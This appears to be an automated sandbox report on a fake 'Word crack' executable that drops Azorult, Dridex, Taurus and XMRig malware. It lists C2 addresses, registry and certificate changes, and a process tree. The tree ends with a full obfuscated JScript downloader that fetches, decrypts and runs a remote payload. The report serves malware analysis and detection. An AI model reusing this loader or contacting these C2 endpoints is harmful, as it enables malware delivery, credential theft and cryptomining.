azorult | 262a367ee600b909197651eb0f94925fc99a72582ab85c8edd26abb079b0d901

Analysis

max time kernel
90s
max time network
1806s
platform
windows7_x64
resource
win7v20201028
submitted
04-04-2021 05:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Lynda_Com_Word_crack.exe

Score

10^/10

azorult dridex taurus xmrig 10111 botnet infostealer loader miner stealer trojan

Malware Config

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

dridex

Botnet

10111

210.65.244.183:8443

216.10.251.121:6601

rc4.plain

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
botnet dridex
Taurus Stealer
Taurus is an infostealer first seen in June 2020.
trojan stealer taurus

Taurus Stealer Payload 1 IoCs

resource	yara_rule
behavioral5/memory/2564-234-0x0000000000400000-0x000000000587C000-memory.dmp	family_taurus_stealer

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Dridex Loader 2 IoCs

Detects Dridex both x86 and x64 loader in memory.

botnet loader

resource	yara_rule
behavioral5/memory/2168-204-0x0000000000400000-0x000000000043D000-memory.dmp	dridex_ldr
behavioral5/memory/2168-236-0x0000000000400000-0x000000000043D000-memory.dmp	dridex_ldr

XMRig Miner Payload 4 IoCs

miner

resource	yara_rule
behavioral5/memory/2108-223-0x00000001402CA898-mapping.dmp	xmrig
behavioral5/memory/2108-222-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral5/memory/2108-226-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral5/memory/2108-229-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 10 IoCs

pid	Process
1596	keygen-pr.exe
628	keygen-step-1.exe
540	keygen-step-3.exe
1048	keygen-step-4.exe
1620	key.exe
824	Setup.exe
736	multitimer.exe
3032	setups.exe
2392	askinstall20.exe
1368	setups.tmp

Loads dropped DLL 23 IoCs

pid	Process
1140	cmd.exe
1140	cmd.exe
1140	cmd.exe
1140	cmd.exe
1140	cmd.exe
1048	keygen-step-4.exe
1596	keygen-pr.exe
1596	keygen-pr.exe
1596	keygen-pr.exe
1596	keygen-pr.exe
1048	keygen-step-4.exe
1048	keygen-step-4.exe
1048	keygen-step-4.exe
1620	key.exe
1048	keygen-step-4.exe
1048	keygen-step-4.exe
1048	keygen-step-4.exe
1048	keygen-step-4.exe
3032	setups.exe
1368	setups.tmp
1368	setups.tmp
1368	setups.tmp
1368	setups.tmp

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
345	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2320	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3628	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 23 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{219007B1-9516-11EB-9AD1-4AAA7B04F187} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2440	PING.EXE
3892	PING.EXE

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2052	chrome.exe
2236	chrome.exe
1400	chrome.exe
1400	chrome.exe
1368	setups.tmp

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	824	Setup.exe
Token: SeCreateTokenPrivilege	2392	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	2392	askinstall20.exe
Token: SeLockMemoryPrivilege	2392	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	2392	askinstall20.exe
Token: SeMachineAccountPrivilege	2392	askinstall20.exe
Token: SeTcbPrivilege	2392	askinstall20.exe
Token: SeSecurityPrivilege	2392	askinstall20.exe
Token: SeTakeOwnershipPrivilege	2392	askinstall20.exe
Token: SeLoadDriverPrivilege	2392	askinstall20.exe
Token: SeSystemProfilePrivilege	2392	askinstall20.exe
Token: SeSystemtimePrivilege	2392	askinstall20.exe
Token: SeProfSingleProcessPrivilege	2392	askinstall20.exe
Token: SeIncBasePriorityPrivilege	2392	askinstall20.exe
Token: SeCreatePagefilePrivilege	2392	askinstall20.exe
Token: SeCreatePermanentPrivilege	2392	askinstall20.exe
Token: SeBackupPrivilege	2392	askinstall20.exe
Token: SeRestorePrivilege	2392	askinstall20.exe
Token: SeShutdownPrivilege	2392	askinstall20.exe
Token: SeDebugPrivilege	2392	askinstall20.exe
Token: SeAuditPrivilege	2392	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	2392	askinstall20.exe
Token: SeChangeNotifyPrivilege	2392	askinstall20.exe
Token: SeRemoteShutdownPrivilege	2392	askinstall20.exe
Token: SeUndockPrivilege	2392	askinstall20.exe
Token: SeSyncAgentPrivilege	2392	askinstall20.exe
Token: SeEnableDelegationPrivilege	2392	askinstall20.exe
Token: SeManageVolumePrivilege	2392	askinstall20.exe
Token: SeImpersonatePrivilege	2392	askinstall20.exe
Token: SeCreateGlobalPrivilege	2392	askinstall20.exe
Token: 31	2392	askinstall20.exe
Token: 32	2392	askinstall20.exe
Token: 33	2392	askinstall20.exe
Token: 34	2392	askinstall20.exe
Token: 35	2392	askinstall20.exe
Token: SeDebugPrivilege	3628	taskkill.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
1400	chrome.exe
2364	firefox.exe
2364	firefox.exe
2364	firefox.exe
2364	firefox.exe
972	iexplore.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2364	firefox.exe
2364	firefox.exe
2364	firefox.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
972	iexplore.exe
972	iexplore.exe
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1084 wrote to memory of 1140	1084	Lynda_Com_Word_crack.exe	30
PID 1084 wrote to memory of 1140	1084	Lynda_Com_Word_crack.exe	30
PID 1084 wrote to memory of 1140	1084	Lynda_Com_Word_crack.exe	30
PID 1084 wrote to memory of 1140	1084	Lynda_Com_Word_crack.exe	30
PID 296 wrote to memory of 1236	296	chrome.exe	31
PID 296 wrote to memory of 1236	296	chrome.exe	31
PID 296 wrote to memory of 1236	296	chrome.exe	31
PID 1400 wrote to memory of 840	1400	chrome.exe	34
PID 1400 wrote to memory of 840	1400	chrome.exe	34
PID 1400 wrote to memory of 840	1400	chrome.exe	34
PID 1140 wrote to memory of 1596	1140	cmd.exe	35
PID 1140 wrote to memory of 1596	1140	cmd.exe	35
PID 1140 wrote to memory of 1596	1140	cmd.exe	35
PID 1140 wrote to memory of 1596	1140	cmd.exe	35
PID 1140 wrote to memory of 1596	1140	cmd.exe	35
PID 1140 wrote to memory of 1596	1140	cmd.exe	35
PID 1140 wrote to memory of 1596	1140	cmd.exe	35
PID 1140 wrote to memory of 628	1140	cmd.exe	37
PID 1140 wrote to memory of 628	1140	cmd.exe	37
PID 1140 wrote to memory of 628	1140	cmd.exe	37
PID 1140 wrote to memory of 628	1140	cmd.exe	37
PID 1140 wrote to memory of 540	1140	cmd.exe	38
PID 1140 wrote to memory of 540	1140	cmd.exe	38
PID 1140 wrote to memory of 540	1140	cmd.exe	38
PID 1140 wrote to memory of 540	1140	cmd.exe	38
PID 1140 wrote to memory of 1048	1140	cmd.exe	39
PID 1140 wrote to memory of 1048	1140	cmd.exe	39
PID 1140 wrote to memory of 1048	1140	cmd.exe	39
PID 1140 wrote to memory of 1048	1140	cmd.exe	39
PID 1596 wrote to memory of 1620	1596	keygen-pr.exe	41
PID 1596 wrote to memory of 1620	1596	keygen-pr.exe	41
PID 1596 wrote to memory of 1620	1596	keygen-pr.exe	41
PID 1596 wrote to memory of 1620	1596	keygen-pr.exe	41
PID 1596 wrote to memory of 1620	1596	keygen-pr.exe	41
PID 1596 wrote to memory of 1620	1596	keygen-pr.exe	41
PID 1596 wrote to memory of 1620	1596	keygen-pr.exe	41
PID 1048 wrote to memory of 824	1048	keygen-step-4.exe	40
PID 1048 wrote to memory of 824	1048	keygen-step-4.exe	40
PID 1048 wrote to memory of 824	1048	keygen-step-4.exe	40
PID 1048 wrote to memory of 824	1048	keygen-step-4.exe	40
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43
PID 1400 wrote to memory of 1728	1400	chrome.exe	43

C:\Users\Admin\AppData\Local\Temp\Lynda_Com_Word_crack.exe
"C:\Users\Admin\AppData\Local\Temp\Lynda_Com_Word_crack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1140
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1596
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1620
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:2064
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:628
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    PID:540
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      PID:2404
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2440
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      PID:824
    - - C:\Users\Admin\AppData\Local\Temp\6E6R66WA84\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6E6R66WA84\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        
        PID:736
      - C:\Users\Admin\AppData\Local\Temp\6E6R66WA84\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6E6R66WA84\multitimer.exe" 1 101
        6⤵
        
        PID:3768
    - - C:\Users\Admin\AppData\Local\Temp\PSS622DACF\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PSS622DACF\setups.exe" ll
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3032
      - C:\Users\Admin\AppData\Local\Temp\is-H588L.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-H588L.tmp\setups.tmp" /SL5="$301BE,635399,250368,C:\Users\Admin\AppData\Local\Temp\PSS622DACF\setups.exe" ll
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:1368
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
        7⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:972
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:972 CREDAT:275457 /prefetch:2
        8⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2648
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" 